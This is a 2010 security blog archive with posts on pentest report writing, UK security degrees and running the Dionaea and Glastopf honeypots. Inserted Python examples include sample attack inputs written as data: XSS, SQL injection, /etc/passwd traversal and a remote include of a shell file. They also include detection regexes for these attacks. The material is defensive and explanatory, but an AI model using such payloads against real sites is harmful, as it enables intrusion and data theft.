2010 January | ethicalhack3r

Posts from January 2010

January 30th 2010

Writing reports – Oh noes!

Report writing has a bad reputation: everyone seems to hate writing reports and believes them to be the anticlimax of the assessment process. I haven’t been writing reports for very long, and the reports I have written I have enjoyed; no doubt in time the novelty will wear off and I will grow to hate them too. There are, however, lessons that I have learnt in my short report-writing experience which I believe could have made my report writing that little bit easier and less time consuming. Those lessons I am going to share with you, and if you’re just starting out in your report-writing duties, hopefully they can help you too. Or, if you’re a report-writing guru, share your tips with me! The reports I have written are mainly web application assessments, so I will concentrate on those.


During the testing phase of the assessment, document as much information as possible! There’s nothing worse than getting halfway through your report and realising you forgot to document the affected vulnerable variable, you didn’t take a screenshot, or you don’t know why you took the screenshot in the first place! This wastes a hell of a lot of time retracing your steps or revisiting the vulnerability to gather more information. All this information should be documented and well organised. What I have done to help keep me organised is to create a spreadsheet template for documenting anything I find. Make sure you gather all the information necessary when you have found something, and don’t move on until you have all the information you need for that particular finding.


Take screenshots of everything, but remember what you took them for! Find a suitable screenshot application; most OSs come with a default screenshot tool, but there are others out there that may make your life easier. When taking screenshots, ensure that you don’t have any other tabs open or any other applications running which are not related to the assessment itself, otherwise unrelated (and possibly other clients’) data ends up in the evidence. Save your screenshots in an adequate location and use an intelligent naming system, e.g. clientname-xss-1.png. If possible, time stamp every screenshot to keep a time log of your work.
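As an added example (not the author’s spreadsheet template), here is the documentation and screenshot advice above turned into a small findings log: a record type with the fields that must be captured before moving on, the clientname-xss-1.png naming scheme with a UTC timestamp appended, and a check that lists everything still missing from a finding. The field names, the file-name pattern and the two sample findings are assumptions made here for illustration.

```python
"""Findings log with a completeness check and a screenshot naming convention.

Added example for this post; it is not the author's spreadsheet template.
The field names, the file-name pattern and the two sample findings are
assumptions made here for illustration.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime, timezone

# <client>-<vuln>-<n>.png as suggested above, with an optional UTC timestamp
# appended (acme-xss-1-20100128T140509Z.png) so the time log comes for free.
SCREENSHOT_RE = re.compile(
    r"^(?P<client>[a-z0-9]+)-(?P<vuln>[a-z0-9]+)-(?P<n>\d+)"
    r"(?:-(?P<ts>\d{8}T\d{6}Z))?\.png$"
)

# Nothing gets written up until every one of these is filled in.
REQUIRED = ("client", "vuln_type", "url", "parameter", "payload",
            "impact", "evidence", "found_at")


@dataclass
class Finding:
    client: str
    vuln_type: str        # the accepted term, e.g. OWASP's "xss" or "sqli"
    url: str
    parameter: str        # the affected variable, the thing that is easiest to forget
    payload: str          # exactly what was sent
    impact: str           # one sentence in layman's terms for the management readers
    evidence: list = field(default_factory=list)   # screenshot file names
    found_at: str = ""    # ISO 8601 UTC timestamp
    notes: str = ""


def screenshot_name(client: str, vuln_type: str, n: int, when: datetime) -> str:
    """File name that records client, vulnerability, sequence number and capture time."""
    stamp = when.astimezone(timezone.utc).strftime("%Y%m%dT%H%M%SZ")
    return f"{client}-{vuln_type}-{n}-{stamp}.png"


def problems(finding: Finding) -> list:
    """Every reason this finding is not ready to be written up (empty list means ready)."""
    out = [f"missing {name}" for name in REQUIRED if not getattr(finding, name)]
    for shot in finding.evidence:
        m = SCREENSHOT_RE.match(shot)
        if m is None:
            out.append(f"screenshot {shot!r} does not follow <client>-<vuln>-<n>.png")
        elif (m["client"], m["vuln"]) != (finding.client, finding.vuln_type):
            out.append(f"screenshot {shot!r} belongs to a different client or finding")
    return out


CAPTURED = datetime(2010, 1, 28, 14, 5, 9, tzinfo=timezone.utc)   # constructed capture time

# Constructed sample findings: one complete, one that would stall the report.
COMPLETE = Finding(
    client="acme", vuln_type="xss", url="https://acme.example/search",
    parameter="q", payload="<script>alert(document.cookie)</script>",
    impact="An attacker can run script in other users' browsers and take over their sessions.",
    evidence=[screenshot_name("acme", "xss", 1, CAPTURED)],
    found_at=CAPTURED.isoformat(),
)
INCOMPLETE = Finding(
    client="acme", vuln_type="sqli", url="https://acme.example/news",
    parameter="",                       # affected variable never noted down
    payload="1' OR '1'='1", impact="",  # nothing yet for the non-technical readers
    evidence=["Screenshot 2010-01-28 at 14.07.31.png",   # default OS name, says nothing
              "acme-xss-2.png"],                          # filed under the wrong finding
)

if __name__ == "__main__":
    for f in (COMPLETE, INCOMPLETE):
        print(f.vuln_type, "on", f.url, "->", problems(f) or "ready to write up")
```

Run it and the second finding reports the missing parameter, impact and timestamp, plus the two screenshots that would have sent you back to retest; the check is meant to be run before you leave a finding, not when writing up three days later.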


OWASP

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software.


OWASP has tons of information on its website about all kinds of web application security topics. This information is very useful when writing reports, to help you better explain the finding or to find the accepted term for the vulnerability you have found. OWASP also has some great books which can be bought in paperback from lulu.com or downloaded for free in PDF format. If you’re not a member of OWASP, become one now! (If you do use any direct quotes from OWASP, reference them.)


PAGE BREAKS! Use page breaks when writing your report; they help with the formatting and stop you having to keep reformatting the document as you add more information.


Be thorough! Explain as much as possible about the finding; this will help the client understand the problem and hopefully save you some time at a later date answering questions. As well as being thorough and technical, explain your findings in layman’s terms. You don’t know the technical expertise of the person who may be reading your report. In most cases managers and directors will read the report, and they haven’t got a clue what a variable is or what Session Fixation is.


Proofread and re-proofread. Your clients are paying good money for your professional expertise, and they are expecting a professional report. Spell checkers don’t find all of the spelling errors! (Don’t forget to use the appropriate dictionary, US or UK.) Have someone within your company (who is authorised to see the report) proofread it for you. You’ve been looking at the report for the past three days; it’s always good to have a fresh pair of eyes look over it.


Keep a blank report template; this will save you time when writing future reports, as you won’t have to organise and format everything again.


I’m sure there are plenty of other things I should be doing in my report writing to make my life easier; these I’m sure I will learn in time. If you have any tips/hints, let me know!


Some resources and other helpful links:
Introduction_to_Security_Assessments.ppt
Security_Assessment_Template.doc
ORG (OWASP Report Generator)
The WASC Threat Classification v2.0
The Web Application Hackers Handbook – Checklist of tasks



January 25th 2010

Ethical Hacking / Security University Degrees UK

One of the most popular posts on my blog is the Guest post: Current Available UK Degrees by 1337speak from April last year. I have decided to update the list to keep the information up to date.


Those of you who know me will know that I myself am enrolled on one of these university courses. I believe that if you’re starting out in security and want to make a career out of it, this may be the best place to start. For me the course has done wonders, not only in what I have learnt but also in the people I’ve met and the drive it has given me to succeed in my chosen career.


BSc Security/Ethical Hacking Degrees in the UK:
Ethical Hacking for Computer Security – Northumbria University
Ethical Hacking and Network Security – Coventry University
Ethical Hacking & Countermeasures – University of Abertay
Computer Security & Ethical Hacking – Leeds Metropolitan University
Ethical Hacking and Security Systems Design – University of Sunderland
IT Security – University of Central Lancashire
Computer Security – De Montfort University
Computer Security – Staffordshire University
IT Security – University of Wolverhampton

More courses:
UCAS G550


I have surprised myself at how many courses are actually out there! Most of the courses have started in the past three years or will be starting in the next two. It looks like there will be a lot more job competition in the next 5-10 years in the security industry. That’s OK; it will keep me on my toes. It seems information security in the UK is starting to become widespread, and this can only be a good thing in the long run.


The courses listed above are BSc university degrees; there are also MSc security courses and others out there which I have not listed.



January 19th 2010

SecurityPodcasts Boxee App

What is Boxee?

Boxee is the best way to enjoy entertainment from the Internet and computer on your TV

http://www.boxee.tv/


Boxee allows you to develop ‘Apps’, which are basically XML files that grab RSS feeds. These Apps can be installed through remote repositories. To truncate and combine all the security podcasts I used Yahoo! Pipes.


At the time of writing, the SecurityPodcasts Boxee App includes PaulDotCom, Exotic Liability, TRACSec, EuroTrashSec, Security Justice and SecuraBit.


How to add the SecurityPodcasts App:


1. Run Boxee.
2. Click on ‘Apps’.
3. Click on ‘Repositories’ under ‘Extras’.
4. Click ‘Add Repository’.
5. Enter my repository URL – http://www.ethicalhack3r.co.uk/repository
6. Click on ‘ethicalhack3r’.
7. Click on ‘SecurityPodcasts’.
8. Click on ‘Add to my Apps’.

SecurityPodcasts will now be in your Apps screen.


Currently SecurityPodcasts truncates the podcasts to the last 3 released. If you think this should be increased/decreased, let me know.



January 17th 2010

Dionaea – Low interaction honeypot

After running Glastopf (Glastopf – Web Application Honeypot) for a few days and not getting any hits, I was a bit disappointed. I speculate that maybe you need to give web application honeypots more time to propagate across the Internet and get picked up by search engines to receive any significant hits, or even give the honeypot its own domain name. From my earlier post you will notice that I had tried to get Dionaea to run first.


Markus, the lead developer of Dionaea, got in contact after he read my post and saw that I was having trouble getting it running. It turned out to be a complete fail on my part: after following the instructions on the Dionaea homepage, Dionaea installed perfectly fine; it was just a case of me not knowing how to run it properly.


What is Dionaea?

Dionaea is meant to be a nepenthes successor, embedding python as scripting language, using libemu to detect shellcodes, supporting ipv6 and tls

Dionaea’s intention is to trap malware exploiting vulnerabilities exposed by services offered to a network; the ultimate goal is gaining a copy of the malware.


Dionaea offers the following services by default: SMB (the main service offered), HTTP, FTP and TFTP. The scan below also shows the RPC endpoint mapper on 135/tcp and HTTPS on 443/tcp.

Here is an Nmap scan of the honeypot (the default 1,000 TCP ports; TFTP is UDP, so it does not appear here):

PORT    STATE SERVICE
21/tcp  open  ftp
|_ ftp-anon: Anonymous FTP login allowed
42/tcp  open  tcpwrapped
80/tcp  open  http?
|_ html-title: Directory listing for /
135/tcp open  msrpc?
443/tcp open  ssl/https?
|_ sslv2: server still supports SSLv2
|_ html-title: Directory listing for /
445/tcp open  microsoft-ds?


Statistics:


Dionaea was running for 1 day, 11 hours and 44 minutes.
The first hit took 14 hours, 10 minutes and 16 seconds.
During that time there were 164 total remote hits.
Top 3 ports: 445, 135 and 0. (in order of hits)


RPC vulnerabilities exploited (Microsoft Security Bulletin IDs):
MS03-026
MS04-011
MS04-012
MS05-017
MS07-065
MS06-066
MS05-039
MS08-067


Captured Malware:
14a09a48ad23fe0ea5a180bee8cb750a
31ab688b36e7d8e5ce1082faa95f730e
53fed7473c878ad4b4e57a42c99df38f
69101c9cbc14f5778efa795bbd25e02c
833cda5b5bef5989deb6bf57c557ce30
93094c5ea5a47e5c5f3e020f2c434c35
df51e3310ef609e908a6b487a28ac068
f2d8d3ef1d5623bdfa9a0eebd4fc2266
f8815cdca238ad5ab566f05f5a6335a4


You can search for the malware associated with the MD5 hashes above here: http://www.virustotal.com/buscaHash.html
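As an added example (not dionaea’s own tooling), here is how the figures in the statistics above and the list of captured samples can be pulled out of a dionaea-style logsql SQLite database. The table and column names follow dionaea’s logsql module as I remember it (a connections table and a downloads table); the rows, hosts, hashes and the start and end times are constructed here so the script runs offline. The one caveat worth knowing is that dionaea records its own listening sockets and outbound fetches in the same connections table, so hits have to be filtered to the accepted connections or the counts (and the top ports) come out wrong.

```python
"""Honeypot run statistics from a dionaea-style logsql SQLite database.

Added example for this post; it is not dionaea's own tooling. The table and
column names follow dionaea's logsql module as I remember it (a connections
table and a downloads table); the rows, hosts, hashes and start/end times are
constructed here so that the script runs offline.
"""
import sqlite3
from datetime import datetime, timedelta, timezone

SCHEMA = """
CREATE TABLE connections (
    connection           INTEGER PRIMARY KEY,
    connection_type      TEXT,      -- 'listen', 'accept', 'connect', ...
    connection_transport TEXT,
    connection_protocol  TEXT,
    connection_timestamp INTEGER,   -- unix epoch seconds
    local_host  TEXT, local_port  INTEGER,
    remote_host TEXT, remote_port INTEGER
);
CREATE TABLE downloads (
    download          INTEGER PRIMARY KEY,
    connection        INTEGER,      -- the connection the sample arrived on
    download_url      TEXT,
    download_md5_hash TEXT
);
"""

START = datetime(2010, 1, 15, 20, 0, 0, tzinfo=timezone.utc)   # assumed start of the run
END = START + timedelta(days=1, hours=11, minutes=44)          # assumed time the box was switched off

# Constructed inbound connections: (offset from START, remote host, local port, service)
SAMPLE_HITS = [
    (timedelta(hours=14, minutes=10, seconds=16), "198.51.100.7", 445, "smbd"),
    (timedelta(hours=14, minutes=12), "198.51.100.7", 135, "epmapper"),
    (timedelta(hours=15), "203.0.113.9", 445, "smbd"),
    (timedelta(hours=16), "203.0.113.9", 445, "smbd"),
    (timedelta(hours=20), "192.0.2.33", 80, "httpd"),
    (timedelta(hours=21), "192.0.2.33", 445, "smbd"),
    (timedelta(hours=22), "198.51.100.7", 135, "epmapper"),
]
# Constructed downloads: (connection id, URL the shellcode pointed at, placeholder MD5)
SAMPLE_DOWNLOADS = [
    (5, "http://198.51.100.7:8080/x.exe", "0123456789abcdef0123456789abcdef"),
    (7, "http://203.0.113.9:1234/load.exe", "fedcba9876543210fedcba9876543210"),
    (10, "http://192.0.2.33:9/x.exe", "0123456789abcdef0123456789abcdef"),  # same sample again
]


def build_sample_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    # dionaea records its own listening sockets (and its outbound fetches of
    # malware) in the same table, so only 'accept' rows count as remote hits.
    listeners = [("listen", "tcp", svc, int(START.timestamp()), "0.0.0.0", port, "", 0)
                 for port, svc in ((21, "ftpd"), (80, "httpd"), (135, "epmapper"), (445, "smbd"))]
    accepts = [("accept", "tcp", svc, int((START + off).timestamp()), "10.0.0.5", port, rhost, 1025 + i)
               for i, (off, rhost, port, svc) in enumerate(SAMPLE_HITS)]
    db.executemany(
        "INSERT INTO connections (connection_type, connection_transport, connection_protocol,"
        " connection_timestamp, local_host, local_port, remote_host, remote_port)"
        " VALUES (?, ?, ?, ?, ?, ?, ?, ?)", listeners + accepts)
    db.executemany(
        "INSERT INTO downloads (connection, download_url, download_md5_hash) VALUES (?, ?, ?)",
        SAMPLE_DOWNLOADS)
    db.commit()
    return db


def summarise(db: sqlite3.Connection, start: datetime, end: datetime) -> dict:
    """The figures quoted in the post: uptime, time to first hit, hit count, top ports, samples."""
    hits = "FROM connections WHERE connection_type = 'accept'"
    total = db.execute(f"SELECT COUNT(*) {hits}").fetchone()[0]
    first_ts = db.execute(f"SELECT MIN(connection_timestamp) {hits}").fetchone()[0]
    top_ports = [port for port, _ in db.execute(
        f"SELECT local_port, COUNT(*) AS n {hits} GROUP BY local_port ORDER BY n DESC, local_port LIMIT 3")]
    # Distinct hashes only: the same worm arriving from ten hosts is one sample.
    samples = [h for (h,) in db.execute(
        "SELECT DISTINCT download_md5_hash FROM downloads ORDER BY download_md5_hash")]
    return {
        "uptime": end - start,
        "time_to_first_hit": datetime.fromtimestamp(first_ts, timezone.utc) - start,
        "total_hits": total,
        "top_ports": top_ports,
        "captured_md5": samples,
    }


def fmt_duration(td: timedelta) -> str:
    """'1 day, 11 hours and 44 minutes' style, as in the post."""
    secs = int(td.total_seconds())
    days, secs = divmod(secs, 86400)
    hours, secs = divmod(secs, 3600)
    minutes, secs = divmod(secs, 60)
    words = [f"{n} {unit}{'' if n == 1 else 's'}"
             for n, unit in ((days, "day"), (hours, "hour"), (minutes, "minute"), (secs, "second")) if n]
    if not words:
        return "0 seconds"
    return words[0] if len(words) == 1 else ", ".join(words[:-1]) + " and " + words[-1]


if __name__ == "__main__":
    s = summarise(build_sample_db(), START, END)
    print("Dionaea was running for", fmt_duration(s["uptime"]))
    print("The first hit took", fmt_duration(s["time_to_first_hit"]))
    print("Total remote hits:", s["total_hits"], "top ports:", s["top_ports"])
    print("Captured samples:", *s["captured_md5"], sep="\n  ")
```

Against a real logsql.sqlite you would replace build_sample_db() with sqlite3.connect("logsql.sqlite") and take the start time from the first 'listen' row; the distinct hash list is what you then feed to the VirusTotal hash search linked above.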


Dionaea is excellent, I feel that I have only scratched the surface of its true potential. For now unfortunately, the honeypot is turned off until I find a more suitable place to store it other than my living room floor. Hopefully I will do more work in the area of honeypots in the near future once I have some more spare time.



January 10th 2010

Glastopf – Web Application Honeypot


I bought an old battered PC over the weekend with the goal of installing a honeypot. I had never installed a honeypot before, so wasn’t quite sure what to expect. At first I decided on Dionaea, the successor to Nepenthes; I had heard great things about Nepenthes from a friend of mine (Infosanity). After going through the installation process I couldn’t get Dionaea to ‘make’ with the right Python version detected (> 3.0), so after about an hour of playing around I decided to give Glastopf a try.


Glastopf is a honeypot which emulates thousands of vulnerabilities to gather data from attacks targeting web applications. The principle behind it is very simple: reply with the correct response to the attacker exploiting the web application. The project was kicked off by Lukas Rist around one year ago, and the results we got during this time are very promising and an incentive to put even more effort into the development of this unique tool.


Glastopf was very easy to install and configure: I simply downloaded the Subversion trunk and ran it with “sudo python webserver.py”. Glastopf was then up and running, but not configured. Glastopf gives you the option to save the honeypot logs to a MySQL database; for this, all you have to do is install MySQL and python-mysql, set up the database and tables, and add the ‘mysql.py’ plugin to the configuration file. Glastopf provides the table structure already set out in the ‘/structure/log.sql’ file. To import the file I used ‘mysql-navigator’ (sudo apt-get install mysql-navigator), a GUI client for MySQL; you can, however, just use the MySQL command line client.


All I had to do then was forward port 80 on my router to the machine running Glastopf. I will now leave the machine running for a few days and hopefully come back with some statistics, which I will of course be posting and making pretty little graphs out of. :) If the initial statistics and hits are positive, I will try to keep the honeypot running indefinitely and somehow link the stats to the blog.
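To make the principle in the Glastopf description above concrete (“reply with the correct response to the attacker exploiting the web application”), here is an added example of the two halves of a web application honeypot: recognising which attack a request is attempting, and answering as a vulnerable site would. This is not Glastopf’s code; the three patterns are a deliberately small subset of what a real honeypot matches, and the fake /etc/passwd and the sample request lines are constructed for illustration. A real RFI handler would go on to fetch the remote file and emulate the PHP it contains, which cannot be done offline, so that step is a placeholder here.

```python
"""Request classifier and canned responses in the spirit of a web application honeypot.

Added example for this post; it is not Glastopf's code and the patterns are
a deliberately small subset of what a real honeypot matches. The rules, the
fake /etc/passwd and the sample request lines are constructed for illustration.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# (label, pattern tried against every decoded query-string value)
RULES = [
    ("rfi", re.compile(r"^(?:https?|ftp)://", re.I)),                 # parameter points at a remote include
    ("lfi", re.compile(r"(?:\.\./){2,}|/etc/passwd|/proc/self/environ", re.I)),
    ("sqli", re.compile(r"\bunion\b.+\bselect\b|'\s*or\s*'?\d+'?\s*=\s*'?\d+", re.I)),
]

FAKE_PASSWD = (                       # what a vulnerable box would have leaked
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/bin/sh\n"
)


def classify(request_line: str) -> dict:
    """Pick apart one HTTP request line and name the first attack pattern that matches."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for label, rx in RULES:
            if rx.search(value):
                return {"method": method, "path": parts.path, "attack": label,
                        "parameter": name, "value": value}
    return {"method": method, "path": parts.path, "attack": None,
            "parameter": None, "value": None}


def respond(hit: dict) -> tuple:
    """(status, body) that keeps the attacker believing the exploit worked.

    A real honeypot fetches the remote file on an RFI and emulates the PHP it
    contains; offline we can only return a placeholder for it.
    """
    if hit["attack"] == "lfi" and "passwd" in hit["value"]:
        return 200, FAKE_PASSWD
    if hit["attack"] == "rfi":
        return 200, f"<!-- would fetch and emulate {hit['value']} here -->\n"
    if hit["attack"] == "sqli":
        return 200, "<html><body><h1>News</h1><p>Latest story</p></body></html>\n"
    return 404, "Not Found\n"


# Constructed request lines of the kind that turn up in web server logs
SAMPLE_REQUESTS = [
    "GET /index.php?page=http://203.0.113.5/shell.txt? HTTP/1.1",
    "GET /view.php?file=../../../../etc/passwd HTTP/1.1",
    "GET /news.php?id=1'%20or%20'1'='1 HTTP/1.1",
    "GET /index.php?page=about HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        hit = classify(line)
        status, body = respond(hit)
        print(f"{hit['attack'] or 'benign':6} {hit['path']} {hit['parameter'] or ''} -> {status}")
```

Note that the classifier works on the decoded parameter values (parse_qsl undoes the %20 in the SQL injection sample), which is where the patterns belong; matching the raw request line would miss anything the attacker URL-encoded. The dictionary classify() returns is also the row you would want in the MySQL log table: path, parameter, attack type and the offending value.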